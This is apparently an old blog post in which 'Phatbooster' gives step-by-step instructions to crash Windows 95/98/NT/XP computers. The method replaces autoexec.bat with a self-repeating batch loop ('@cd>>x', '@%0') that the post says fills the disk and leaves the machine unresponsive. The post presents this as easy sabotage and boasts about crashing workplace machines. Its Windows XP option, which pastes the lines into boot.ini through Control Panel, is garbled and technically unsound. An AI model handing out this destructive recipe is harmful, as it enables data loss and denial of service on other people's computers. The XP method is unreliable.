Phatbooster explains simple destruction!

How anyone can crash a Windows or MS-DOS computer? duh…..

Yes you can, says Phatbooster!

Using the simplest of resources a three year old could crash one, and
now you can too. Here is how it is done:

==========================

Option 1 (for win98/win95/winNT)
Go to DOS or open Notepad in accessories
Open the autoexec.bat file in the C:\ directory
Copy these two lines into the file:

@cd>>x
@%0

Delete all other lines in the autoexec.bat
Save

==========================

Option 2 (for win xp)
+ Open –> Control Panel –> System –> Click the “Advance Tab” –>
click “settings” under “Startup and Recovery” and edit the
“Default Operating System”
+ Ninja copy/paste these two lines into the file:

@cd>>x
@%0

Delete all other lines in the boot.ini
Save
==========================

That’s it. No sweat! There is nothing else you have to do, this will fuck up the
machine indefinetly. Want to know how it works?

The @ symbol preceeding each command makes it so the command is not
displayed in DOS. cd>>x will copy the current directory into a file
called x. %0 repeats this command over and over again and lags the
computers processes. The file called x will eventually fill the hard
drive with useless data until nothing else will fit on the hard drive.

All you will see when you reboot the computer is this:

Starting MS-DOS…

The computer will most likely not respond to any commands after that.
The way to stop this program from destroying the computer is booting
with a system disk or holding the shift key on boot. When you’re in DOS
delete the lines from the autoexec.bat file so it won’t fuck it up.
Replace the original commands in the autoexe.bat and save it. Reboot.

This script written by Phatbooster is completely malicious,
I don’t recommend you try it on your own computer, it’s senseless
and insane. I got this idea a long time ago from a gurl named
Aresgada, it has been tried, tested, and
will work. If I wanted to, I could crash every machine running at my
opis, but that would be pointless. Don’t use this for anything dumb,
it’s more powerful than it looks, you have been warned.

Leave a Reply